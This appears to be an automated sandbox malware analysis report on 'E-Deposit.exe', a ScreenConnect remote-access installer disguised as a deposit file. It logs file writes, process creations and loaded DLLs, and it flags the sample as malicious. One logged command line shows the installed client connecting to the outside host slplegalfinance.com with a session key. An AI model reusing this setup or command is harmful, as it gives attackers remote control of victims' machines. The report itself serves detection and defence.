Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                  System Summary

Source: E-Deposit.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Code function: 7_2_05CB01F0 CreateProcessAsUserW, 7_2_05CB01F0
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\59d35c.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID57F.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID590.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSID7B3.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\59d35e.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\59d35e.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{B8D1B927-3B49-E2F3-F63F-B1B560CECE3D}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ngzwv2nr.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ngzwv2nr.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\u2cov4vk.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\u2cov4vk.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vtho1xxc.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\vtho1xxc.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ovekkuwe.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\ovekkuwe.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\isbgtems.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\isbgtems.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cj0gwio1.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\cj0gwio1.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rn2gncqb.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rn2gncqb.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\bweik44o.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\bweik44o.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rapy2x3w.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\rapy2x3w.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3xs004yw.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\3xs004yw.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\scdm2p5m.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (484f9eed1d8e13b9)\scdm2p5m.newcfg
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSID590.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Code function: 7_2_017BD6F8 7_2_017BD6F8
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B627008 8_2_00007FFD9B627008
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B621124 8_2_00007FFD9B621124
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B936E7A 8_2_00007FFD9B936E7A
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B935D61 8_2_00007FFD9B935D61
Source: E-Deposit.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: E-Deposit.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: E-Deposit.exe | Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: E-Deposit.exe | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: E-Deposit.exe | Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSfxCA.dllL vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1699705428.0000000005E0C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1697957314.0000000005A50000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.000000000100F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.000000000100F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1712436337.000000000816D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1697594749.00000000059C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1677953094.0000000003370000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000002.1683762590.00000000045CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenamelibwebp.dllB vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenamezlib.dll2 vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameSfxCA.dllL vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenamewixca.dll\ vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs E-Deposit.exe
Source: E-Deposit.exe | Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs E-Deposit.exe
Source: E-Deposit.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.E-Deposit.exe.ae63d4.4.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.E-Deposit.exe.59c0000.4.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.E-Deposit.exe.b6c3d4.2.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.E-Deposit.exe.5a70000.7.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal66.evad.winEXE@15/65@1/1
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)
Source: C:\Users\user\Desktop\E-Deposit.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E-Deposit.exe.log
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe | Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Desktop\E-Deposit.exe | File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: E-Deposit.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: E-Deposit.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\E-Deposit.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\E-Deposit.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: E-Deposit.exe | ReversingLabs: Detection: 26%
Source: E-Deposit.exe | Virustotal: Detection: 31%
Source: E-Deposit.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: E-Deposit.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\E-Deposit.exe | File read: C:\Users\user\Desktop\E-Deposit.exe
Source: unknown | Process created: C:\Users\user\Desktop\E-Deposit.exe "C:\Users\user\Desktop\E-Deposit.exe"
Source: C:\Users\user\Desktop\E-Deposit.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User"
Source: C:\Users\user\Desktop\E-Deposit.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User"
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\E-Deposit.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textshaping.dll
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
